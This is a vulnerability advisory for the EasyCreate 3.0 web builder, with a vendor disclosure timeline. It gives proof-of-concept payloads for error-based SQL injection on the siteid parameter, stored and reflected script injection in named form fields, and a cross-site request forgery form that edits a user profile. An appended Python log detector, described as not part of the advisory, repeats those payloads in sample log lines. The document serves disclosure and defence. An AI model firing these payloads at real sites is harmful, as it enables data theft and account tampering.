EasyCreate 3.0 Multiple Vulnerabilities
- Site: http://www.iscripts.com
[Advisory Timeline]
[17.11.2015] First contact to vendor.
[08.12.2015] Follow up with vendor. No response received.
[08.12.2015] Ticket Created using online portal (id #010248399110346).
[08.12.2015] Ticket closed by vendor without requesting vulnerability details.
[28.12.2015] Vendor responds asking more details.
[29.12.2015] Sent details to the vendor.
[05.01.2016] Follow up with vendor. No response received.
[14.01.2016] Follow up with vendor. No response received.
[28.01.2016] Public Security advisory released.
[Bug Summary]
- SQL Injection
- Cross Site Scripting (Stored)
- Cross Site Scripting (Reflected)
- Cross Site Request Forgery
[Impact]
- High
[Affected Version]
- EasyCreate 3.0
[Advisory]
- ZSL-2016-5298
- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5298.php
[Proof-of-Concept]
1. SQL Injection
Parameter:
siteid (GET)
Payload:
action=editsite&siteid=6 AND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(3405=3405,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Multiple Stored Cross Site Scripting
Parameter:
siteName (POST)
Payload:
Content-Disposition: form-data; name="siteName"
<script>alert(1)</script>
Parameter:
selectedimage (POST)
Payload:
selectedimage=<script>alert(1)</script>
Parameter:
filename (POST)
Payload:
filename=<script>alert(1)</script>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
3. Multiple Reflected Cross Site Scripting
Parameter:
catid (GET)
Parameters:
selectedimage, description, keywords, robotans, refreshans, authorans, copyrightans, revisitans, cmbSearchType (POST)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
4. Multiple Cross Site Request Forgery (CSRF)
Sample Payload for editing profile:
<html>
  <body>
    <form action="http://localhost/easycreate/demo/editprofile.php?act=post" method="POST">
      <input type="hidden" name="vuser_login" value="user" />
      <input type="hidden" name="vuser_name" value="Demo User" />
      <input type="hidden" name="vuser_lastname" value="PWNED" />
      <input type="hidden" name="vuser_email" value="demo@demo.com" />
      <input type="hidden" name="vuser_address1" value="a" />
      <input type="hidden" name="vcity" value="" />
      <input type="hidden" name="vstate" value="" />
      <input type="hidden" name="vcountry" value="United States" />
      <input type="hidden" name="vzip" value="" />
      <input type="hidden" name="vuser_phone" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
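As an added example that is not part of the advisory, the following Python detector flags the parameter and payload patterns listed above (the error-based SQLi shape on siteid, script injection in the named XSS parameters) in web-server access logs or in a captured POST body. The log lines, IP addresses and script paths are constructed for illustration; only the parameter names come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Parameters named in the advisory, grouped by the flaw class they carry.
SQLI_PARAMS = {"siteid"}
XSS_PARAMS = {"catid", "siteName", "selectedimage", "filename", "description",
              "keywords", "robotans", "refreshans", "authorans", "copyrightans",
              "revisitans", "cmbSearchType"}

# Indicators for the error-based SQLi technique in the PoC (nested SELECT,
# information_schema, FLOOR(RAND(...)) and for script injection.
SQLI_RE = re.compile(r"(?i)\bselect\b.*\bfrom\b|information_schema|floor\(rand\(")
XSS_RE = re.compile(r"(?i)<\s*script|on\w+\s*=|javascript:")

# Apache combined log format; only the request line and status are needed here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log lines (hypothetical paths, RFC 5737 documentation IPs).
LOG_LINES = """\
203.0.113.7 - - [28/Jan/2016:10:01:02 +0000] "GET /easycreate/demo/index.php?action=editsite&siteid=6%20AND%20(SELECT%203405%20FROM(SELECT%20COUNT(*),CONCAT(0x71716b6a71,(SELECT%20(ELT(3405=3405,1))),0x71627a7671,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 1234
203.0.113.7 - - [28/Jan/2016:10:01:05 +0000] "GET /easycreate/demo/search.php?catid=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4321
198.51.100.4 - - [28/Jan/2016:10:02:00 +0000] "GET /easycreate/demo/index.php?action=editsite&siteid=6 HTTP/1.1" 200 4321
"""

def inspect_request(method, target, body=""):
    """Return [(param, flaw), ...] for one request; body is a urlencoded POST body."""
    findings = []
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if method == "POST" and body:
        params += parse_qsl(body, keep_blank_values=True)
    for name, value in params:
        value = unquote_plus(value)  # second decode catches double-encoded payloads
        if name in SQLI_PARAMS and SQLI_RE.search(value):
            findings.append((name, "sqli"))
        if name in XSS_PARAMS and XSS_RE.search(value):
            findings.append((name, "xss"))
    return findings

def scan_log(lines):
    """Run inspect_request over access-log lines; returns [(ip, param, flaw), ...]."""
    hits = []
    for line in lines.splitlines():
        m = LOG_RE.match(line)
        if m:  # skip lines that do not parse rather than failing the whole scan
            for name, flaw in inspect_request(m["method"], m["target"]):
                hits.append((m["ip"], name, flaw))
    return hits

if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit)
```

Access logs do not carry POST bodies, so the stored-XSS parameters are only visible when inspect_request is fed a body from a proxy or WAF capture.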
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"